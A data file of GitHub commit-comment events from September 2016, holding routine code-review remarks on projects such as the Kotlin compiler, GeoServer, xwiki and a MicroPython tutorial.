{"id":"4520087652","type":"CommitCommentEvent","actor":{"login":"lucaa"},"repo":{"name":"xwiki-contrib/workflow-publication"},"payload":{"comment":{"id":18907826,"position":253,"line":998,"path":"xwiki-workflow-publication-api/src/main/java/org/xwiki/workflowpublication/internal/DefaultPublicationWorkflow.java","commit_id":"e1063d57e447d19c2d323b78e55c825987fcb485","created_at":"2016-09-06T09:05:16Z","updated_at":"2016-09-06T09:05:16Z","body":"Actually, copy contents to new version is also doing some cleanup upon moving documents between mirrors: draft and published, by default cleans up comments and rights, but since the function is overridable (the cleanUpIrrelevantData function), it could clean up some more elements that need to stay specific to published or draft documents. \r\nShouldn't we call the same function here, to be sure that the same rules are followed?"}},"created_at":"2016-09-06T09:05:16Z"}
{"id":"4520088502","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18907831,"position":53,"line":53,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:05:27Z","updated_at":"2016-09-06T09:05:27Z","body":"or from apps menu"}},"created_at":"2016-09-06T09:05:27Z"}
{"id":"4520089500","type":"CommitCommentEvent","actor":{"login":"xjg0124"},"repo":{"name":"xjg0124/Fire-and-Smoke-Detection"},"payload":{"comment":{"id":18907833,"position":null,"line":null,"path":null,"commit_id":"4c0a56cd7d32ac62258b445166ea8128335a6573","created_at":"2016-09-06T09:05:38Z","updated_at":"2016-09-06T09:05:38Z","body":"Use C3D"}},"created_at":"2016-09-06T09:05:38Z"}
{"id":"4520092194","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18907841,"position":58,"line":58,"path":"test/services/feed_import/service_test.rb","commit_id":"aadebb41f5a05425a7e4983431ac293ce1a4006d","created_at":"2016-09-06T09:06:12Z","updated_at":"2016-09-06T09:06:12Z","body":"Nice. An alternative would be `ActionDispatch::Http::UploadedFile.new(tempfile: ..., filename: .., type: 'text/xml')`"}},"created_at":"2016-09-06T09:06:12Z"}
{"id":"4520092724","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18907844,"position":15,"line":15,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"8668799e1dfdf8ca3469b096a788734f38ed7781","created_at":"2016-09-06T09:06:18Z","updated_at":"2016-09-06T09:06:18Z","body":"avail_2 isn't in the table"}},"created_at":"2016-09-06T09:06:18Z"}
{"id":"4520092834","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18907845,"position":62,"line":62,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:06:19Z","updated_at":"2016-09-06T09:06:19Z","body":"How do I flash the app to the device? Do I just plug it in and click a button in mu? Do I need to mount it or be in a special group?"}},"created_at":"2016-09-06T09:06:19Z"}
{"id":"4520094204","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18907848,"position":9,"line":9,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"8668799e1dfdf8ca3469b096a788734f38ed7781","created_at":"2016-09-06T09:06:35Z","updated_at":"2016-09-06T09:06:35Z","body":"avail_1 isn't in the table"}},"created_at":"2016-09-06T09:06:35Z"}
{"id":"4520096325","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18907856,"position":10,"line":10,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"8668799e1dfdf8ca3469b096a788734f38ed7781","created_at":"2016-09-06T09:07:04Z","updated_at":"2016-09-06T09:07:04Z","body":"what kind of element do we want to use here? A p or a span probably."}},"created_at":"2016-09-06T09:07:04Z"}
{"id":"4520097083","type":"CommitCommentEvent","actor":{"login":"ZhuMingmin9123"},"repo":{"name":"ZhuMingmin9123/test_repo"},"payload":{"comment":{"id":18907859,"position":null,"line":null,"path":null,"commit_id":"dc688753574abc09e5c0ae681f03bbd5aa348841","created_at":"2016-09-06T09:07:14Z","updated_at":"2016-09-06T09:07:14Z","body":"this is first try!"}},"created_at":"2016-09-06T09:07:14Z"}
{"id":"4520098725","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18907861,"position":13,"line":13,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"8668799e1dfdf8ca3469b096a788734f38ed7781","created_at":"2016-09-06T09:07:33Z","updated_at":"2016-09-06T09:07:33Z","body":"maybe remove dur?"}},"created_at":"2016-09-06T09:07:33Z"}
{"id":"4520099332","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18907863,"position":19,"line":19,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"8668799e1dfdf8ca3469b096a788734f38ed7781","created_at":"2016-09-06T09:07:40Z","updated_at":"2016-09-06T09:07:40Z","body":"maybe remove dur?"}},"created_at":"2016-09-06T09:07:40Z"}
{"id":"4520101687","type":"CommitCommentEvent","actor":{"login":"duaraghav8"},"repo":{"name":"duaraghav8/Solium"},"payload":{"comment":{"id":18907866,"position":null,"line":null,"path":null,"commit_id":"afc194990f7e3710cea9ecc8f848590ec3354c31","created_at":"2016-09-06T09:08:11Z","updated_at":"2016-09-06T09:08:11Z","body":"fixes #29 "}},"created_at":"2016-09-06T09:08:11Z"}
{"id":"4520101746","type":"CommitCommentEvent","actor":{"login":"JamieHegarty"},"repo":{"name":"triple111/MUDscape"},"payload":{"comment":{"id":18907867,"position":null,"line":null,"path":null,"commit_id":"7e81e35ab3f5508479471fddd2677b27cb6cc0a1","created_at":"2016-09-06T09:08:12Z","updated_at":"2016-09-06T09:08:12Z","body":"What is this commit? Seems the last merge was added again?"}},"created_at":"2016-09-06T09:08:12Z"}
{"id":"4520105347","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18907879,"position":112,"line":112,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:08:53Z","updated_at":"2016-09-06T09:08:53Z","body":"Is sudo the right way to do it? Would adding myself to the `dialout` group work and be safer?"}},"created_at":"2016-09-06T09:08:53Z"}
{"id":"4520106361","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18907884,"position":26,"line":26,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"8668799e1dfdf8ca3469b096a788734f38ed7781","created_at":"2016-09-06T09:09:06Z","updated_at":"2016-09-06T09:09:06Z","body":"```bdd\r\nAnd we extract a new segment from begin time <begin_seg> to end time <end_seq>\r\nThen the new segment contains ...\r\n```\r\n\r\nSomething like that?"}},"created_at":"2016-09-06T09:09:06Z"}
{"id":"4520106692","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18907886,"position":null,"line":null,"path":null,"commit_id":"328a5ffec02f686248718de0a070520a30ad8805","created_at":"2016-09-06T09:09:10Z","updated_at":"2016-09-06T09:09:10Z","body":"Do you have a log of this situation? I wonder why the core isn't shutting down when we ask him to do so."}},"created_at":"2016-09-06T09:09:10Z"}
{"id":"4520107882","type":"CommitCommentEvent","actor":{"login":"Chips-fr"},"repo":{"name":"Chips-fr/uae4arm-rpi"},"payload":{"comment":{"id":18907892,"position":null,"line":null,"path":null,"commit_id":"68a20a1be689c5beb01ac6d00010233be616ff58","created_at":"2016-09-06T09:09:24Z","updated_at":"2016-09-06T09:09:24Z","body":"In this commit it's removed not added..."}},"created_at":"2016-09-06T09:09:24Z"}
{"id":"4520107941","type":"CommitCommentEvent","actor":{"login":"cbetta"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18907893,"position":7,"line":47,"path":"package.json","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-06T09:09:25Z","updated_at":"2016-09-06T09:09:25Z","body":"Do you really want to go from 0 to 2 dependencies just to add JWT support? It's not that hard to hand-roll JWTs is it?"}},"created_at":"2016-09-06T09:09:25Z"}
{"id":"4520110078","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18907899,"position":49,"line":66,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:09:52Z","updated_at":"2016-09-06T09:09:52Z","body":"`OperatorNameConventions.GET`"}},"created_at":"2016-09-06T09:09:52Z"}
{"id":"4520110333","type":"CommitCommentEvent","actor":{"login":"mokoaki"},"repo":{"name":"git/git"},"payload":{"comment":{"id":18907901,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2016-09-06T09:09:55Z","updated_at":"2016-09-06T09:09:55Z","body":"( ｰ`дｰ´)"}},"created_at":"2016-09-06T09:09:55Z"}
{"id":"4520110605","type":"CommitCommentEvent","actor":{"login":"Sillyblower"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18907904,"position":null,"line":null,"path":null,"commit_id":"2de38e5568de9f29c1e2f175ba92971308c20f78","created_at":"2016-09-06T09:09:59Z","updated_at":"2016-09-06T09:09:59Z","body":"@mrn0p3c run \"npm install pngjs  --save\" and you should be fine :) "}},"created_at":"2016-09-06T09:09:59Z"}
{"id":"4520112951","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18907912,"position":112,"line":112,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:10:28Z","updated_at":"2016-09-06T09:10:28Z","body":"What happens after the connection? How do I *use* the device?"}},"created_at":"2016-09-06T09:10:28Z"}
{"id":"4520113566","type":"CommitCommentEvent","actor":{"login":"butterfly1992"},"repo":{"name":"butterfly1992/Check_DB_slave_status"},"payload":{"comment":{"id":18907913,"position":null,"line":null,"path":null,"commit_id":"54e4d94e2a16c94e5a613569b14383c7f3430fe6","created_at":"2016-09-06T09:10:35Z","updated_at":"2016-09-06T09:10:35Z","body":"跳过错误脚本和使用说明文档"}},"created_at":"2016-09-06T09:10:35Z"}
{"id":"4520116444","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18907918,"position":50,"line":67,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:11:14Z","updated_at":"2016-09-06T09:11:14Z","body":"Please call `single()` instead, so that it'll fail if we add another `get` to KProperty"}},"created_at":"2016-09-06T09:11:14Z"}
{"id":"4520118631","type":"CommitCommentEvent","actor":{"login":"YosemiteX"},"repo":{"name":"YosemiteX/project-1"},"payload":{"comment":{"id":18907925,"position":6,"line":6,"path":".gitattributes","commit_id":"feeaf73f557006a5612bc0b0da5ddd4181474114","created_at":"2016-09-06T09:11:41Z","updated_at":"2016-09-06T09:11:41Z","body":"asdawd"}},"created_at":"2016-09-06T09:11:41Z"}
{"id":"4520120498","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"petertodd/python-bitcoinlib"},"payload":{"comment":{"id":18907930,"position":null,"line":null,"path":null,"commit_id":"0d6e65a235946ff0fd6b931db82ec2bc5b97a20f","created_at":"2016-09-06T09:12:06Z","updated_at":"2016-09-06T09:12:06Z","body":"0d6e65a"}},"created_at":"2016-09-06T09:12:06Z"}
{"id":"4520124338","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18907933,"position":6,"line":56,"path":"static/js/services/db.js","commit_id":"dc4c11d615c95934867f06b21f3f99f7c1a6ac02","created_at":"2016-09-06T09:12:53Z","updated_at":"2016-09-06T09:12:53Z","body":"I skimmed through the pouchdb code and it looks like it cleans up any indexes that aren't currently referenced by ddocs, so it shouldn't matter if the new ones have generated yet."}},"created_at":"2016-09-06T09:12:53Z"}
{"id":"4520126533","type":"CommitCommentEvent","actor":{"login":"BowVanSith"},"repo":{"name":"BowVanSith/hello-world"},"payload":{"comment":{"id":18907940,"position":null,"line":null,"path":null,"commit_id":"569b59c2c84ffd43e4989976c0d07d064202c101","created_at":"2016-09-06T09:13:20Z","updated_at":"2016-09-06T09:13:20Z","body":"ja ist besser\r\n"}},"created_at":"2016-09-06T09:13:20Z"}
{"id":"4520127889","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18907943,"position":146,"line":218,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:13:38Z","updated_at":"2016-09-06T09:13:38Z","body":"Duplication with line 65 detected"}},"created_at":"2016-09-06T09:13:38Z"}
{"id":"4520131355","type":"CommitCommentEvent","actor":{"login":"piroor"},"repo":{"name":"piroor/multipletab"},"payload":{"comment":{"id":18907957,"position":null,"line":null,"path":null,"commit_id":"089f676a18434d0b954ffcf5a4c01a9383f9dc4d","created_at":"2016-09-06T09:14:22Z","updated_at":"2016-09-06T09:14:22Z","body":"Thanks. The commit edee6a0fb8a4273e27de9a3c36fc5d2bd3b24e00 seems to fix this regression for me."}},"created_at":"2016-09-06T09:14:22Z"}
{"id":"4520132222","type":"CommitCommentEvent","actor":{"login":"neby55"},"repo":{"name":"eslachance/php-transparent-proxy"},"payload":{"comment":{"id":18907961,"position":49,"line":122,"path":"proxy.php","commit_id":"f8451eef80edc5be2b3b602826c9a1fe6b86a78a","created_at":"2016-09-06T09:14:32Z","updated_at":"2016-09-06T09:14:32Z","body":"There is a parse error : you missed the \"if\" => } else**if** ($url['scheme' ..."}},"created_at":"2016-09-06T09:14:32Z"}
{"id":"4520132676","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jumjum888/bitfinex-api-go"},"payload":{"comment":{"id":18907962,"position":null,"line":null,"path":null,"commit_id":"0cc49de8538ba67e58a1f62ce4fcbd01f19a5983","created_at":"2016-09-06T09:14:38Z","updated_at":"2016-09-06T09:14:38Z","body":"0cc49de"}},"created_at":"2016-09-06T09:14:38Z"}
{"id":"4520134738","type":"CommitCommentEvent","actor":{"login":"mantesat"},"repo":{"name":"mantesat/geoserver"},"payload":{"comment":{"id":18907977,"position":123,"line":331,"path":"src/main/src/main/java/org/geoserver/catalog/CoverageViewReader.java","commit_id":"a96efee80476eb09a6f9531e9b7df460d811f254","created_at":"2016-09-06T09:15:04Z","updated_at":"2016-09-06T09:15:04Z","body":"No, these are extra spaces. I'll fix it."}},"created_at":"2016-09-06T09:15:04Z"}
{"id":"4520136993","type":"CommitCommentEvent","actor":{"login":"SunZhenzhou"},"repo":{"name":"zbqhc/lsmath"},"payload":{"comment":{"id":18907984,"position":null,"line":null,"path":null,"commit_id":"9b4fbd5e8d3b0f4b608e2ee02b401f699f9aedd9","created_at":"2016-09-06T09:15:32Z","updated_at":"2016-09-06T09:15:32Z","body":"哈哈哈哈"}},"created_at":"2016-09-06T09:15:32Z"}
{"id":"4520137230","type":"CommitCommentEvent","actor":{"login":"kenta-s"},"repo":{"name":"git/git"},"payload":{"comment":{"id":18907985,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2016-09-06T09:15:34Z","updated_at":"2016-09-06T09:15:34Z","body":"🎉 🎉 🎉 "}},"created_at":"2016-09-06T09:15:34Z"}
{"id":"4520138761","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18907988,"position":125,"line":143,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:15:56Z","updated_at":"2016-09-06T09:15:56Z","body":"`OperatorNameConventions.SET`"}},"created_at":"2016-09-06T09:15:56Z"}
{"id":"4520138766","type":"CommitCommentEvent","actor":{"login":"Backern"},"repo":{"name":"Dat210Skoleruten/Kode"},"payload":{"comment":{"id":18907989,"position":null,"line":null,"path":null,"commit_id":"a148189211d439d9f7eac4b06d8e345eb32b3f48","created_at":"2016-09-06T09:15:56Z","updated_at":"2016-09-06T09:15:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;qgzdj9RQ&#x2F;2-fsdf\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> fsdf</a>"}},"created_at":"2016-09-06T09:15:56Z"}
{"id":"4520139423","type":"CommitCommentEvent","actor":{"login":"lucaa"},"repo":{"name":"xwiki-contrib/workflow-publication"},"payload":{"comment":{"id":18907993,"position":22,"line":207,"path":"xwiki-workflow-publication-api/src/main/java/org/xwiki/workflowpublication/internal/DefaultPublicationWorkflow.java","commit_id":"e1063d57e447d19c2d323b78e55c825987fcb485","created_at":"2016-09-06T09:16:05Z","updated_at":"2016-09-06T09:16:05Z","body":"I'm not sure I understand this part here... You're assuming that the default locale of the fromDoc is the root locale? Shouldn't you add here the default locale of the fromDoc, i.e. fromDoc.getLocale()? (I might be missing something, though...)"}},"created_at":"2016-09-06T09:16:05Z"}
{"id":"4520139928","type":"CommitCommentEvent","actor":{"login":"Anupam707"},"repo":{"name":"Big-Data-Centre-of-Excellence/BDCoE-Trainee-2016"},"payload":{"comment":{"id":18907994,"position":null,"line":null,"path":null,"commit_id":"13fd5d0157f714774a870a299c95b27a5800a902","created_at":"2016-09-06T09:16:12Z","updated_at":"2016-09-06T09:16:12Z","body":"Sir,this game's name is Balloon buster,in this game balloon's and bomb's appear on screen randomly and if you click on balloon,that balloon bursts and your score increases and if you click on bomb,game is over then.\r\nit may happen that sometimes balloon and bomb appear together one over another to confuse the player."}},"created_at":"2016-09-06T09:16:12Z"}
{"id":"4520142212","type":"CommitCommentEvent","actor":{"login":"schnika"},"repo":{"name":"njiuko/sabredav_client"},"payload":{"comment":{"id":18908002,"position":8,"line":18,"path":"lib/sabredav_client/events.rb","commit_id":"6ab2984264d8f5301f47cfb3d7897b833e540f6b","created_at":"2016-09-06T09:16:40Z","updated_at":"2016-09-06T09:16:40Z","body":"`res.header[\"etag\"]` is enough :)"}},"created_at":"2016-09-06T09:16:40Z"}
{"id":"4520142906","type":"CommitCommentEvent","actor":{"login":"mantesat"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18908007,"position":8,"line":188,"path":"modules/library/coverage/src/main/java/org/geotools/coverage/grid/io/AbstractGridFormat.java","commit_id":"e81a0daebcd34a05a0ff802208f432a3651f8c65","created_at":"2016-09-06T09:16:48Z","updated_at":"2016-09-06T09:16:48Z","body":"I see your point, the \"order\" term meaning is not clear at this sentence."}},"created_at":"2016-09-06T09:16:48Z"}
{"id":"4520146012","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18908014,"position":150,"line":222,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:17:27Z","updated_at":"2016-09-06T09:17:27Z","body":"This parameter is not necessary, you can do `originalFunctionDesc is PropertyGetterDescriptor` instead"}},"created_at":"2016-09-06T09:17:27Z"}
{"id":"4520148189","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18908021,"position":149,"line":221,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:17:54Z","updated_at":"2016-09-06T09:17:54Z","body":"This class should be private"}},"created_at":"2016-09-06T09:17:54Z"}
{"id":"4520149605","type":"CommitCommentEvent","actor":{"login":"schnika"},"repo":{"name":"njiuko/sabredav_client"},"payload":{"comment":{"id":18908026,"position":6,"line":58,"path":"spec/sabredav_client/events_spec.rb","commit_id":"6ab2984264d8f5301f47cfb3d7897b833e540f6b","created_at":"2016-09-06T09:18:14Z","updated_at":"2016-09-06T09:18:14Z","body":"lets return the etag without the `\"`"}},"created_at":"2016-09-06T09:18:14Z"}
{"id":"4520150132","type":"CommitCommentEvent","actor":{"login":"mantesat"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18908028,"position":18,"line":128,"path":"modules/library/coverage/src/main/java/org/geotools/coverage/grid/io/GridCoverage2DReader.java","commit_id":"e81a0daebcd34a05a0ff802208f432a3651f8c65","created_at":"2016-09-06T09:18:20Z","updated_at":"2016-09-06T09:18:20Z","body":"Understood, I will remove this declaration from here."}},"created_at":"2016-09-06T09:18:20Z"}
{"id":"4520151523","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geoserver"},"payload":{"comment":{"id":18908030,"position":51,"line":946,"path":"src/wms/src/main/java/org/geoserver/wms/map/RenderedImageMapOutputFormat.java","commit_id":"a96efee80476eb09a6f9531e9b7df460d811f254","created_at":"2016-09-06T09:18:37Z","updated_at":"2016-09-06T09:18:37Z","body":"I believe you should first check if the reader supports bands selection, and only after that alter the style. Altering a style should not be one in place as styles are cached in the ResourcePool, you should use a DuplicatingStyleVisitor subclass instead (it could be that the style has already been duplicated once when it reaches here, but I would not risk it)"}},"created_at":"2016-09-06T09:18:37Z"}
{"id":"4520152799","type":"CommitCommentEvent","actor":{"login":"kwk"},"repo":{"name":"almighty/almighty-core"},"payload":{"comment":{"id":18908034,"position":24,"line":35,"path":"migration/migration.go","commit_id":"8a4a85c391d8bda112c3d86f2ca082d8dd10ae02","created_at":"2016-09-06T09:18:52Z","updated_at":"2016-09-06T09:18:52Z","body":"@baijum is there an issue for this already open?"}},"created_at":"2016-09-06T09:18:52Z"}
{"id":"4520154934","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908040,"position":62,"line":62,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:19:20Z","updated_at":"2016-09-06T09:19:20Z","body":"Device is mounted automatically in Fedora so you only need to click to \"Flash\" button."}},"created_at":"2016-09-06T09:19:20Z"}
{"id":"4520155086","type":"CommitCommentEvent","actor":{"login":"miguelbgouveia"},"repo":{"name":"ckan/ckan"},"payload":{"comment":{"id":18908041,"position":5,"line":5,"path":"ckanext/reclineview/theme/templates/recline_view.html","commit_id":"0666e9459aaf292ddc9690068d4ab80028a4a127","created_at":"2016-09-06T09:19:21Z","updated_at":"2016-09-06T09:19:21Z","body":"I get an error here. In my instance of ckan the h.get_mapview_config() is not recognized as a function. To resolve the problem I just deleted the \"or h.get_mapview_config()\" string and it work. I just not know if it is the best correction."}},"created_at":"2016-09-06T09:19:21Z"}
{"id":"4520155387","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geoserver"},"payload":{"comment":{"id":18908042,"position":51,"line":946,"path":"src/wms/src/main/java/org/geoserver/wms/map/RenderedImageMapOutputFormat.java","commit_id":"a96efee80476eb09a6f9531e9b7df460d811f254","created_at":"2016-09-06T09:19:25Z","updated_at":"2016-09-06T09:19:25Z","body":"Also, add a test with band selection and no coverage view in the middle, but a straight reader, to make sure that case keeps on working fine (I don't believe we have one right now, but I might be wrong)."}},"created_at":"2016-09-06T09:19:25Z"}
{"id":"4520156861","type":"CommitCommentEvent","actor":{"login":"dogsky"},"repo":{"name":"dogsky/test"},"payload":{"comment":{"id":18908048,"position":null,"line":null,"path":null,"commit_id":"8f1226d37746bc1b95463916bc12fd97e8ac2a3b","created_at":"2016-09-06T09:19:42Z","updated_at":"2016-09-06T09:19:42Z","body":"images: alexwhen/docker-2048\r\nscript:\r\n- echo \"disidsud.\" \r\n- echo \"Build has been completed.\"\r\n"}},"created_at":"2016-09-06T09:19:42Z"}
{"id":"4520157200","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18908051,"position":5,"line":86,"path":"static/js/app.js","commit_id":"dc4c11d615c95934867f06b21f3f99f7c1a6ac02","created_at":"2016-09-06T09:19:47Z","updated_at":"2016-09-06T09:19:47Z","body":"Does that reduce our ability to acknowledge conflicts? I know we don't deal with them, but right now we can find out that they exist. This may not be relevant to us: there is not a whole lot of editing of documents that happens, excluding things like view toggles (which aren't particularly important if you lose one anyway), just making sure we understand fully."}},"created_at":"2016-09-06T09:19:47Z"}
{"id":"4520160458","type":"CommitCommentEvent","actor":{"login":"tcratius"},"repo":{"name":"pooleja/SpeedE16"},"payload":{"comment":{"id":18908057,"position":null,"line":null,"path":null,"commit_id":"4d8dd1989dcdde8fc2bb413d316eb3cf88346780","created_at":"2016-09-06T09:20:28Z","updated_at":"2016-09-06T09:20:28Z","body":"Sigh, I'm going to be a pest until I understand this or get blocked.  Hopefully not the latter.  How does one set up this client-remote.py or even just a client.py\r\n"}},"created_at":"2016-09-06T09:20:28Z"}
{"id":"4520169621","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18908088,"position":188,"line":260,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:22:20Z","updated_at":"2016-09-06T09:22:20Z","body":"I think you shouldn't mix Kotlin parameter indices and JVM local slot numbers. Something would likely go bad here when some parameters are `Long`s/`Double`s"}},"created_at":"2016-09-06T09:22:20Z"}
{"id":"4520171559","type":"CommitCommentEvent","actor":{"login":"jaredo"},"repo":{"name":"jaredo/jeigen"},"payload":{"comment":{"id":18908099,"position":null,"line":null,"path":null,"commit_id":"88df1ef86adc2f4323c0fd970f84ceb8d1f79d41","created_at":"2016-09-06T09:22:44Z","updated_at":"2016-09-06T09:22:44Z","body":"Sure. I have added a change to the LICENSE file according to [mozilla's recommendation](https://www.mozilla.org/en-US/MPL/2.0/combining-mpl-and-gpl/) and a note in the README. I am not very familiar with licensing - do you think that is enough?"}},"created_at":"2016-09-06T09:22:44Z"}
{"id":"4520172006","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"bitfinexcom/bitfinex-api-go"},"payload":{"comment":{"id":18908104,"position":null,"line":null,"path":null,"commit_id":"b346ee8e30673b03cf1f3286c12f4ce3c87065e8","created_at":"2016-09-06T09:22:49Z","updated_at":"2016-09-06T09:22:49Z","body":"b346ee8"}},"created_at":"2016-09-06T09:22:49Z"}
{"id":"4520172332","type":"CommitCommentEvent","actor":{"login":"eNiize"},"repo":{"name":"Dat210Skoleruten/Kode"},"payload":{"comment":{"id":18908106,"position":null,"line":null,"path":null,"commit_id":"b0e6cb9d65fb4c9a8da9a68e0763dcf3294797ec","created_at":"2016-09-06T09:22:54Z","updated_at":"2016-09-06T09:22:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HwbLKECX&#x2F;3-jgf\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> jgf</a>"}},"created_at":"2016-09-06T09:22:54Z"}
{"id":"4520173097","type":"CommitCommentEvent","actor":{"login":"Sangheon-Jeong"},"repo":{"name":"Sangheon-Jeong/Hello-World"},"payload":{"comment":{"id":18908109,"position":null,"line":null,"path":null,"commit_id":"f341574ad7bb8e434e07711283d63580a7d7e48d","created_at":"2016-09-06T09:23:03Z","updated_at":"2016-09-06T09:23:03Z","body":"Test"}},"created_at":"2016-09-06T09:23:03Z"}
{"id":"4520174525","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"jline/jline3"},"payload":{"comment":{"id":18908115,"position":null,"line":null,"path":null,"commit_id":"27c7827c47a6863180436bb12e57a9d4b52e6084","created_at":"2016-09-06T09:23:22Z","updated_at":"2016-09-06T09:23:22Z","body":"This commit is wrong imho, so I'll revert it.\r\nThe reason is that signals are now just ignored, so when LineReaderImpl calls terminal.handle() to trap various signals, it has no effect.\r\nIf you want to disable signal handling, this should be done using the nativeSignals boolean field on the builder instead I think.\r\nThoughts ?"}},"created_at":"2016-09-06T09:23:22Z"}
{"id":"4520175925","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908117,"position":10,"line":10,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:23:40Z","updated_at":"2016-09-06T09:23:40Z","body":"\"implementation of Python 3\""}},"created_at":"2016-09-06T09:23:40Z"}
